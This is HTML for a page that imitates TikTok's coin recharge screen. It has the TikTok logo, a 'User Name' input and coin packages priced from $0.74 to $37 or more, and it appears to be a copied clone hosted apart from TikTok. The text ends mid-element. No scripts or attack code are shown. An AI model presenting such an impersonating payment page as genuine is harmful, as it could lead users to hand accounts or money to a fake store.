<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tiktok Coins: Buy and recharge Coins</title>
    <link rel="icon" href="./img/602179070ad3230004b93c28.png" type="image/x-icon">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css"
        integrity="sha512-KfkfwYDsLkIlwQp6LFnl8zNdLGxu9YAA1QvwINks4PhcElQSvqcyVLLD9aMhXd13uQjoXtEKNosOWaZqXgel0g=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" href="./css/style.css">
</head>

<body>
    
    <div id="app" style="min-height:100vh;display:flex;flex-direction:column;justify-content:flex-start">
        <main id="tiktok-live-main-container-id" class="tiktok-t31vku-MainLiveLayoutContainer e4kkv4i0">
            <div class="tiktok-xk7ai4-DivHeaderContainer e10win0d0" style="right: 0;">
                <div class="tiktok-1gd9bb4-DivHeaderWrapperMain e10win0d1">
                    <div class="tiktok-oteyea-DivLeftContainer e16tg5af0">
                        <span>

                        </span>
                        <a class="e1an6zpe0 tiktok-ojnv26-StyledLink-StyledLinkLogo er1vbsz0" href=""
                            style="position: relative;">
                            <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 118 42" width="118"
                                height="42" alt="TikTok">
                                <path fill="#25F4EE"
                                    d="M9.875 16.842v-1.119A8.836 8.836 0 008.7 15.64c-4.797-.006-8.7 3.9-8.7 8.707a8.706 8.706 0 003.718 7.135A8.675 8.675 0 011.38 25.55c0-4.737 3.794-8.598 8.495-8.707z">
                                </path>
                                <path fill="#25F4EE"
                                    d="M10.086 29.526c2.14 0 3.89-1.707 3.967-3.83l.006-18.968h3.463a6.78 6.78 0 01-.11-1.202h-4.726l-.006 18.969a3.978 3.978 0 01-3.967 3.829 3.93 3.93 0 01-1.846-.46 3.949 3.949 0 003.22 1.662zM23.992 13.166v-1.055a6.506 6.506 0 01-3.583-1.068 6.571 6.571 0 003.583 2.123z">
                                </path>
                                <path fill="#FE2C55"
                                    d="M20.409 11.043a6.54 6.54 0 01-1.616-4.315h-1.265a6.557 6.557 0 002.88 4.316zM8.706 20.365a3.98 3.98 0 00-3.973 3.976c0 1.528.869 2.858 2.134 3.523a3.936 3.936 0 01-.754-2.321 3.98 3.98 0 013.973-3.976c.409 0 .805.07 1.175.185v-4.833a8.837 8.837 0 00-1.175-.083c-.07 0-.134.006-.204.006v3.708a3.999 3.999 0 00-1.176-.185z">
                                </path>
                                <path fill="#FE2C55"
                                    d="M23.992 13.166v3.676c-2.453 0-4.727-.786-6.58-2.116v9.621c0 4.802-3.902 8.714-8.706 8.714a8.669 8.669 0 01-4.988-1.579 8.69 8.69 0 006.368 2.781c4.797 0 8.707-3.906 8.707-8.714v-9.621a11.25 11.25 0 006.579 2.116v-4.73c-.48 0-.94-.052-1.38-.148z">
                                </path>
                                <path fill="black"
                                    d="M17.413 24.348v-9.622a11.251 11.251 0 006.58 2.116v-3.676a6.571 6.571 0 01-3.584-2.123 6.61 6.61 0 01-2.888-4.315H14.06l-.006 18.968a3.978 3.978 0 01-3.967 3.83A3.99 3.99 0 016.86 27.87a3.991 3.991 0 01-2.133-3.523A3.98 3.98 0 018.7 20.372c.409 0 .805.07 1.175.185v-3.708c-4.701.103-8.495 3.964-8.495 8.701 0 2.29.888 4.373 2.338 5.933a8.669 8.669 0 004.988 1.58c4.798 0 8.707-3.913 8.707-8.714zM30.048 13.179h14.774l-1.354 4.232h-3.832v15.644h-4.778V17.41l-4.804.006-.006-4.238zM69.032 13.179h15.12l-1.355 4.232h-4.17v15.644h-4.785V17.41l-4.804.006-.006-4.238zM45.73 19.502h4.733v13.553h-4.708l-.026-13.553zM52.347 13.128h4.733v9.257l4.689-4.61h5.646l-5.934 5.76 6.644 9.52h-5.213l-4.433-6.598-1.405 1.362v5.236H52.34V13.128h.006zM102.49 13.128h4.734v9.257l4.688-4.61h5.647l-5.934 5.76 6.643 9.52h-5.206l-4.433-6.598-1.405 1.362v5.236h-4.734V13.128zM48.093 17.954a2.384 2.384 0 002.382-2.384 2.384 2.384 0 10-2.382 2.384z">
                                </path>
                                <path fill="#25F4EE"
                                    d="M83.544 24.942a8.112 8.112 0 017.474-8.087 8.748 8.748 0 00-.709-.026c-4.478 0-8.106 3.631-8.106 8.113 0 4.482 3.628 8.113 8.106 8.113.21 0 .498-.013.71-.026-4.178-.326-7.475-3.823-7.475-8.087z">
                                </path>
                                <path fill="#FE2C55"
                                    d="M92.858 16.83c-.217 0-.505.012-.716.025a8.111 8.111 0 017.468 8.087 8.112 8.112 0 01-7.468 8.087c.211.02.499.026.716.026 4.478 0 8.106-3.631 8.106-8.113 0-4.482-3.628-8.113-8.106-8.113z">
                                </path>
                                <path fill="black"
                                    d="M91.58 28.887a3.94 3.94 0 01-3.94-3.945 3.94 3.94 0 117.882 0c0 2.18-1.77 3.945-3.942 3.945zm0-12.058c-4.477 0-8.106 3.631-8.106 8.113 0 4.482 3.629 8.113 8.106 8.113 4.478 0 8.106-3.631 8.106-8.113 0-4.482-3.628-8.113-8.106-8.113z">
                                </path>
                            </svg></a>
                    </div>
                    <div class="tiktok-1x100u9-DivHeaderCenterContainer e10c4g870">
                        <div>
                            <form data-e2e="search-box" class="search-input tiktok-dhqzc6-FormElement e14ntknm0"
                                action="/search"><input placeholder="Search" name="q" type="search" autocomplete="off"
                                    role="combobox" aria-controls="" aria-label="Tìm kiếm" aria-expanded="false"
                                    aria-autocomplete="list" data-e2e="search-user-input"
                                    class="tiktok-8nwn5k-InputElement e14ntknm3" value=""><span
                                    class="tiktok-hck1rr-SpanSpliter e14ntknm6"></span><button
                                    data-e2e="search-box-button" type="submit" aria-label="Tìm kiếm"
                                    class="tiktok-16dy42q-ButtonSearch e14ntknm7">
                                    <div class="tiktok-17iic05-DivSearchIconContainer e14ntknm8"><svg width="24"
                                            data-e2e="" height="24" viewBox="0 0 48 48" fill="rgba(22, 24, 35, .34)"
                                            xmlns="http://www.w3.org/2000/svg">
                                            <path fill-rule="evenodd" clip-rule="evenodd"
                                                d="M22 10C15.3726 10 10 15.3726 10 22C10 28.6274 15.3726 34 22 34C28.6274 34 34 28.6274 34 22C34 15.3726 28.6274 10 22 10ZM6 22C6 13.1634 13.1634 6 22 6C30.8366 6 38 13.1634 38 22C38 25.6974 36.7458 29.1019 34.6397 31.8113L43.3809 40.5565C43.7712 40.947 43.7712 41.5801 43.3807 41.9705L41.9665 43.3847C41.5759 43.7753 40.9426 43.7752 40.5521 43.3846L31.8113 34.6397C29.1019 36.7458 25.6974 38 22 38C13.1634 38 6 30.8366 6 22Z">
                                            </path>
                                        </svg></div>
                                </button>
                                <div class="tiktok-1mdii59-DivInputBorder e14ntknm1"></div>
                            </form>
                        </div>
                    </div>
                    <div class="tiktok-ba55d9-DivHeaderRightContainer e13wiwn60">
                        <div data-e2e="upload-icon" class="tiktok-gcx66p-DivUploadContainer e18d3d940"><a href=""
                                target="_self" class="e18d3d942 tiktok-2gvzau-ALink-StyledLink er1vbsz1"
                                aria-label="Tải lên một video">
                                <div class="tiktok-1qup28j-DivUpload e18d3d944"><svg
                                        class="tiktok-qeydvm-StyledPlusIcon e18d3d945" width="1em" data-e2e=""
                                        height="1em" viewBox="0 0 16 16" fill="currentColor"
                                        xmlns="http://www.w3.org/2000/svg">
                                        <path fill-rule="evenodd" clip-rule="evenodd"
                                            d="M8 2.5C7.58579 2.5 7.25 2.83579 7.25 3.25V7.25H3.25C2.83579 7.25 2.5 7.58579 2.5 8C2.5 8.41421 2.83579 8.75 3.25 8.75H7.25V12.75C7.25 13.1642 7.58579 13.5 8 13.5C8.41421 13.5 8.75 13.1642 8.75 12.75V8.75H12.75C13.1642 8.75 13.5 8.41421 13.5 8C13.5 7.58579 13.1642 7.25 12.75 7.25H8.75V3.25C8.75 2.83579 8.41421 2.5 8 2.5Z">
                                        </path>
                                    </svg><span class="tiktok-y3rt08-SpanUploadText e18d3d946">Upload </span></div>
                            </a>
                        </div>
                        <div id="infor" class="menu">
                            <div class="infor">
                                <div class="Notification">
                                    <div data-e2e="top-dm-icon"
                                        class="tiktok-1ibfxbr-DivMessageIconContainer e1nx07zo0">
                                        <a aria-label="Mở tin nhắn" class="tiktok-22xkqc-StyledLink er1vbsz0"
                                            href=""><span><svg class="tiktok-y48l9g-StyledIcon e1nx07zo1" width="1em"
                                                    data-e2e="" height="1em" viewBox="0 0 48 48" fill="currentColor"
                                                    xmlns="http://www.w3.org/2000/svg">
                                                    <path fill-rule="evenodd" clip-rule="evenodd"
                                                        d="M2.17877 7.17357C2.50304 6.45894 3.21528 6 4.00003 6H44C44.713 6 45.372 6.37952 45.7299 6.99615C46.0877 7.61278 46.0902 8.37327 45.7365 8.99228L25.7365 43.9923C25.3423 44.6821 24.5772 45.0732 23.7872 44.9886C22.9972 44.9041 22.3321 44.3599 22.0929 43.6023L16.219 25.0017L2.49488 9.31701C1.97811 8.72642 1.85449 7.88819 2.17877 7.17357ZM20.377 24.8856L24.531 38.0397L40.5537 10H8.40757L18.3918 21.4106L30.1002 14.2054C30.5705 13.9159 31.1865 14.0626 31.4759 14.533L32.5241 16.2363C32.8136 16.7066 32.6669 17.3226 32.1966 17.612L20.377 24.8856Z">
                                                    </path>
                                                </svg>
                                            </span>
                                        </a>
                                    </div>
                                    <div tabindex="0" role="button" aria-expanded="false" aria-label="Hộp thư
                                        2 thông báo chưa đọc" data-e2e="inbox-icon"
                                        class="tiktok-1b4xcc5-DivHeaderInboxContainer e18kkhh40" fdprocessedid="muvthm">
                                        <span>
                                            <svg class="tiktok-1g0p6jv-StyledInboxIcon e18kkhh41" width="32" data-e2e=""
                                                height="32" viewBox="0 0 32 32" fill="currentColor"
                                                xmlns="http://www.w3.org/2000/svg">
                                                <path fill-rule="evenodd" clip-rule="evenodd"
                                                    d="M24.0362 21.3333H18.5243L15.9983 24.4208L13.4721 21.3333H7.96047L7.99557 8H24.0009L24.0362 21.3333ZM24.3705 23.3333H19.4721L17.2883 26.0026C16.6215 26.8176 15.3753 26.8176 14.7084 26.0026L12.5243 23.3333H7.62626C6.70407 23.3333 5.95717 22.5845 5.9596 21.6623L5.99646 7.66228C5.99887 6.74352 6.74435 6 7.66312 6H24.3333C25.2521 6 25.9975 6.7435 26 7.66224L26.0371 21.6622C26.0396 22.5844 25.2927 23.3333 24.3705 23.3333ZM12.6647 14C12.2965 14 11.998 14.2985 11.998 14.6667V15.3333C11.998 15.7015 12.2965 16 12.6647 16H19.3313C19.6995 16 19.998 15.7015 19.998 15.3333V14.6667C19.998 14.2985 19.6995 14 19.3313 14H12.6647Z">
                                                </path>
                                            </svg>
                                        </span>
                                        <sup class="tiktok-gb5uwb-SupBadge e18kkhh43">2</sup>
                                        <div data-focus-guard="true" tabindex="-1"
                                            style="width: 1px; height: 0px; padding: 0px; overflow: hidden; position: fixed; top: 1px; left: 1px;">
                                        </div>

                                        <div data-focus-guard="true" tabindex="-1"
                                            style="width: 1px; height: 0px; padding: 0px; overflow: hidden; position: fixed; top: 1px; left: 1px;">
                                        </div>
                                    </div>
                                    <div id="header-more-menu-icon" tabindex="0" role="button"
                                        aria-label="Mở menu cài đặt" aria-expanded="false" aria-haspopup="true"
                                        aria-controls="" data-e2e="profile-icon"
                                        class="tiktok-1igqi6u-DivProfileContainer efubjyv0"
                                        style="background-image: url(&quot;https://p16-sign-useast2a.tiktokcdn.com/tos-useast2a-avt-0068-giso/0dfe3ea52e68bd47d6f657dc3be13df8~c5_720x720.jpeg?x-expires=1687154400&amp;x-signature=79gsaiGufZBBjl7%2FUEuqgWmC2cg%3D&quot;);">
                                    </div>
                                </div>

                            </div>
                        </div>

                    </div>
                </div>
            </div>
            <div class="tiktok-1qjl7qr-DivMainContainer e17zolsy1">
                <div class="tiktok-lp888x-DivContentContainer e17zolsy2">
                    <section class="tiktok-18xp9s9-SectionContentWrapper e14cybcq0">
                        <div class="tiktok-k58u1v-DivTitleInfoContainer e14cybcq1">
                            <h1 data-e2e="wallet-title-get-coins" class="tiktok-1hs3hdy-H1TitleInfoCoin e14cybcq2">
                                Recharge
                            </h1>
                            <a data-e2e="wallet-transaction-history-entrance"
                                class="tiktok-1ytaziy-StyledTransactionHistoryLink e14cybcq3"
                                href="/coin/transaction-history">View transaction history</a>
                        </div>
                        <div class="tiktok-krn24s-DivProfileAndBannerRow e14cybcq8">
                            <div class="tiktok-d2sjra-DivProfileInfo e14cybcq9">
                                <!-- <div role="button" aria-controls="" data-e2e="profile-icon"
                                    class="tiktok-1igqi6u-DivProfileContainer efubjyv0"
                                    style="background-image: url(&quot;https://p16-sign-useast2a.tiktokcdn.com/tos-useast2a-avt-0068-giso/0dfe3ea52e68bd47d6f657dc3be13df8~c5_720x720.jpeg?x-expires=1687154400&amp;x-signature=79gsaiGufZBBjl7%2FUEuqgWmC2cg%3D&quot;); height: 44px; min-width: 44px; margin-left: 0px;">
                                </div>
                                <div id="infor-poin" class="poin">
                                    <div class="tiktok-9l16e2-DivNameCoinInfo e14cybcq10">
                                        <span data-e2e="wallet-user-name"
                                            class="tiktok-1bisljy-SpanNameInfo e14cybcq12">zrtpont
                                        </span>
                                        <div class="tiktok-6vx15k-DivCoinInfo e14cybcq11"><svg
                                                class="tiktok-908odc-StyledCoinIcon e14cybcq5" width="1em" data-e2e=""
                                                height="1em" viewBox="0 0 48 48" fill="none"
                                                xmlns="http://www.w3.org/2000/svg">
                                                <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                                <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                                <path fill-rule="evenodd" clip-rule="evenodd"
                                                    d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z"
                                                    fill="#FABC15"></path>
                                                <path
                                                    d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z"
                                                    fill="#FEF5CD"></path>
                                            </svg><span data-e2e="wallet-coins-balance"
                                                class="tiktok-11tgy7o-SpanCoinNum e14cybcq4">0</span></div>
                                    </div>
                                </div> -->

                            </div>
                        </div>
                    </section>
                    <div data-e2e="wallet-buy-coins-title" class="tiktok-ukphjh-DivRechargeCoins eyr93xl0">Recharge<span
                            class="tiktok-z95cm-SpanContentContainer e13as4wb0">
                            <div data-e2e="wallet-recharge-advantage-tip"
                                class="tiktok-1517q4i-DivRechargeAdvantageInfo e13as4wb2">
                                <span class="tiktok-1rwkvc8-SpanRechargeTitle e13as4wb3">:

                                </span>
                                Save up to 24% compared to in-app purchase
                                <div tabindex="0" aria-describedby="webapp-advantage"
                                    data-e2e="wallet-recharge-advantage-icon"
                                    class="tiktok-1lfugd2-DivExplanationContainer e13as4wb4"><svg
                                        class="tiktok-n2pfir-StyledExclamationMarkCircleIcon e13as4wb5" width="1em"
                                        data-e2e="" height="1em" viewBox="0 0 48 48" fill="currentColor"
                                        xmlns="http://www.w3.org/2000/svg">
                                        <path fill-rule="evenodd" clip-rule="evenodd"
                                            d="M24 6C14.0589 6 6 14.0589 6 24C6 33.9411 14.0589 42 24 42C33.9411 42 42 33.9411 42 24C42 14.0589 33.9411 6 24 6ZM2 24C2 11.8497 11.8497 2 24 2C36.1503 2 46 11.8497 46 24C46 36.1503 36.1503 46 24 46C11.8497 46 2 36.1503 2 24ZM27 16C27 17.6569 25.6569 19 24 19C22.3431 19 21 17.6569 21 16C21 14.3431 22.3431 13 24 13C25.6569 13 27 14.3431 27 16ZM23 22C22.4477 22 22 22.4477 22 23V34C22 34.5523 22.4477 35 23 35H25C25.5523 35 26 34.5523 26 34V23C26 22.4477 25.5523 22 25 22H23Z">
                                        </path>
                                    </svg>
                                </div>
                            </div>
                        </span>
                    </div>
                    <div id="receiver" class="receiver">
                        <div class="others">
                            <svg class="NapXu_content-login-icon" font-size="44px" viewBox="0 0 48 48"
                                fill="currentColor" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em">
                                <circle cx="24" cy="24" r="24" fill="#C3C3C3"></circle>
                                <circle cx="24" cy="22" r="9" fill="#F0F0F0"></circle>
                                <path fill-rule="evenodd" clip-rule="evenodd"
                                    d="M8.28 42.16a18 18 0 0131.37 0A23.9 23.9 0 0123.97 48c-6 0-11.48-2.2-15.69-5.84z"
                                    fill="#F0F0F0"></path>
                            </svg>
                            <input id="inputAccount" class="others-input" type="text" placeholder="User Name">
                        </div>
                    </div>
                    <div class="tiktok-1un7bi9-DivCoinsBkgContainer eyr93xl1">
                        <ol data-e2e="wallet-coins-packages" class="tiktok-1a7iizi-OlCoinsListContainer eyr93xl2">
                            <li>
                                <button id="btn-coin1" data-e2e="wallet-package-selected" aria-label="70 Điểm"
                                    aria-selected="true" class="tiktok-l4v9n8-ButtonContainer e4yj8b60">
                                    <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61">
                                        <span data-e2e="wallet-package-coin-icon-0"
                                            class="tiktok-240y52-SpanNumIcon e4yj8b62">
                                            <svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e=""
                                                height="1em" viewBox="0 0 48 48" fill="none"
                                                xmlns="http://www.w3.org/2000/svg">
                                                <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                                <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                                <path fill-rule="evenodd" clip-rule="evenodd"
                                                    d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z"
                                                    fill="#FABC15"></path>
                                                <path
                                                    d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z"
                                                    fill="#FEF5CD"></path>
                                            </svg>
                                        </span>
                                        <span data-e2e="wallet-package-coin-num-0"
                                            class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">70
                                        </span>
                                    </div>
                                    <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64"><span
                                            data-e2e="wallet-package-price-0"
                                            class="tiktok-10102vh-SpanTextNow e4yj8b66">$ 0.74</span></div>
                                </button>
                            </li>
                            <li>
                                <button id="btn-coin2" data-e2e="wallet-package-1" aria-label="350 Điểm"
                                    aria-selected="false" class="tiktok-l4v9n8-ButtonContainer e4yj8b60">
                                    <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61">
                                        <span data-e2e="wallet-package-coin-icon-1"
                                            class="tiktok-240y52-SpanNumIcon e4yj8b62">
                                            <svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e=""
                                                height="1em" viewBox="0 0 48 48" fill="none"
                                                xmlns="http://www.w3.org/2000/svg">
                                                <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                                <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                                <path fill-rule="evenodd" clip-rule="evenodd"
                                                    d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z"
                                                    fill="#FABC15"></path>
                                                <path
                                                    d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z"
                                                    fill="#FEF5CD"></path>
                                            </svg>
                                        </span>
                                        <span data-e2e="wallet-package-coin-num-1"
                                            class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">350
                                        </span>
                                    </div>
                                    <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64">
                                        <span data-e2e="wallet-package-price-1"
                                            class="tiktok-10102vh-SpanTextNow e4yj8b66">$ 3.7
                                        </span>
                                    </div>
                                </button>
                            </li>
                            <li>
                                <button id="btn-coin3" data-e2e="wallet-package-2" aria-label="700 Điểm"
                                    aria-selected="false" class="tiktok-l4v9n8-ButtonContainer e4yj8b60">
                                    <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61">
                                        <span data-e2e="wallet-package-coin-icon-2"
                                            class="tiktok-240y52-SpanNumIcon e4yj8b62">
                                            <svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e=""
                                                height="1em" viewBox="0 0 48 48" fill="none"
                                                xmlns="http://www.w3.org/2000/svg">
                                                <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                                <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                                <path fill-rule="evenodd" clip-rule="evenodd"
                                                    d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z"
                                                    fill="#FABC15"></path>
                                                <path
                                                    d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z"
                                                    fill="#FEF5CD"></path>
                                            </svg>
                                        </span>
                                        <span data-e2e="wallet-package-coin-num-2"
                                            class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">700
                                        </span>
                                    </div>
                                    <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64">
                                        <span data-e2e="wallet-package-price-2"
                                            class="tiktok-10102vh-SpanTextNow e4yj8b66">$ 7.4
                                        </span>
                                    </div>
                                </button>
                            </li>
                            <li>
                                <button id="btn-coin4" data-e2e="wallet-package-3" aria-label="1400 Điểm"
                                    aria-selected="false" class="tiktok-l4v9n8-ButtonContainer e4yj8b60">
                                    <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61">
                                        <span data-e2e="wallet-package-coin-icon-3"
                                            class="tiktok-240y52-SpanNumIcon e4yj8b62">
                                            <svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e=""
                                                height="1em" viewBox="0 0 48 48" fill="none"
                                                xmlns="http://www.w3.org/2000/svg">
                                                <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                                <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                                <path fill-rule="evenodd" clip-rule="evenodd"
                                                    d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z"
                                                    fill="#FABC15"></path>
                                                <path
                                                    d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z"
                                                    fill="#FEF5CD"></path>
                                            </svg>
                                        </span>
                                        <span data-e2e="wallet-package-coin-num-3"
                                            class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">1,400
                                        </span>
                                    </div>
                                    <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64">
                                        <span data-e2e="wallet-package-price-3"
                                            class="tiktok-10102vh-SpanTextNow e4yj8b66">$ 14.8
                                        </span>
                                    </div>
                                </button>
                            </li>
                            <li>
                                <button id="btn-coin5" data-e2e="wallet-package-4" aria-label="3500 Điểm"
                                    aria-selected="false" class="tiktok-l4v9n8-ButtonContainer e4yj8b60">
                                    <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61">
                                        <span data-e2e="wallet-package-coin-icon-4"
                                            class="tiktok-240y52-SpanNumIcon e4yj8b62">
                                            <svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e=""
                                                height="1em" viewBox="0 0 48 48" fill="none"
                                                xmlns="http://www.w3.org/2000/svg">
                                                <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                                <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                                <path fill-rule="evenodd" clip-rule="evenodd"
                                                    d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z"
                                                    fill="#FABC15"></path>
                                                <path
                                                    d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z"
                                                    fill="#FEF5CD"></path>
                                            </svg>
                                        </span>
                                        <span data-e2e="wallet-package-coin-num-4"
                                            class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">3,500
                                        </span>
                                    </div>
                                    <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64">
                                        <span data-e2e="wallet-package-price-4"
                                            class="tiktok-10102vh-SpanTextNow e4yj8b66">$ 37
                                        </span>
                                    </div>
                                </button>
                            </li>
                            <li>
                                <button id="btn-coin6" data-e2e="wallet-package-5" aria-label="7000 Điểm"
                                    aria-selected="false" class="tiktok-l4v9n8-ButtonContainer e4yj8b60">
                                    <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61">
                                        <span data-e2e="wallet-package-coin-icon-5"
                                            class="tiktok-240y52-SpanNumIcon e4yj8b62"><svg
                                                class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e=""
                                                height="1em" viewBox="0 0 48 48" fill="none"
                                                xmlns="http://www.w3.org/2000/svg">
                                                <circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle>
                                                <circle cx="24" cy="24" r="17" fill="#FACE15"></circle>
                                                <path fill-rule="evenodd" clip-rule="evenodd"
                                                    d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z"
                                                    fill="#FABC15"></path>
                                                <path
